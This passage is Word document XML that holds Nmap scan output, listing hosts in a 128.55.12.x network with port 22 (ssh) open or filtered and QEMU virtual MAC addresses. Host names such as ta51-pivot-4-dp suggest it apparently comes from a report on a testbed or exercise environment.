    <w:p w14:paraId="38062EB1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603A152A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4AD66F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6511228F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:33 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D67B7AA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EFDEE4A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.84</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAB7E8D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3422AFD4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C0323B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3553CF96" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:34 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4F7246" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61DFDDE4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-theia-database-dp (128.55.12.85)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64505469" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (0.039s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C31F27" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708F014B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39318A44" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:35 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C921B76" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C343FA7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.89</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7AD5F1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.075s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026E4417" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B36C90C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCBAF05" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:39 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2406459C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FA92FA4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3895625F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.099s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EBAE67" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE    SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8E81BB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp filtered ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F13B461" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:40 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FBD816" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="159D9EBC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.91</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADF447F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.099s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4253B0CD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE    SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB27B32" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp filtered ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2CF506" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:41 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C0A212" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="591683E6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.92</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCEF5F5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.099s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BE84F4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE    SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FF7363" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp filtered ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FA6246" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:42 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E98F1F1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C869492" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.97</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FEA624" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.099s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31388BB8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6154E71C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11331223" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:47 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4B90F1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="410471A6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta51-pivot-4-dp (128.55.12.98)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6288D022" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (0.039s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A59898" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDBDCCE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B29FA9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:48 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A3BB30" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3850DB08" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta51-pivot-1-dp (128.55.12.99)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EF9D66" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.075s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5375FD36" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707FF26E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778462CA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:49 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCED0E7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1530E897" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1057A4F4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5FCBAF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F159E0A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5CB893" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:50 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F21E286" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31FC2A16" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E76E0D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.078s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1675BD52" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DECA90A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1DAB97" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:52 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4C9A37" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21C5326F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252C88F1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.077s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388E5D5E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A0B47E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58391B57" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:54 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DAC315" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607AB460" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.105</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E66A61B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.077s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FF54D8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38669FB0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5408E5C6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:55 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7463B7AA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3089F3B0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-cadets-3-dp (128.55.12.106)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37567563" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.078s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE237A0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237CB4BE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022E98AC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:56 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A3A213" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="308D9776" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.107</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F84B34" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.078s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A69F2B7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9134BD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A123D5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:57 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE86ECF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05EFB92B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.108</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589F626A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.078s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758F5465" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A5A95F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5F4C98" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
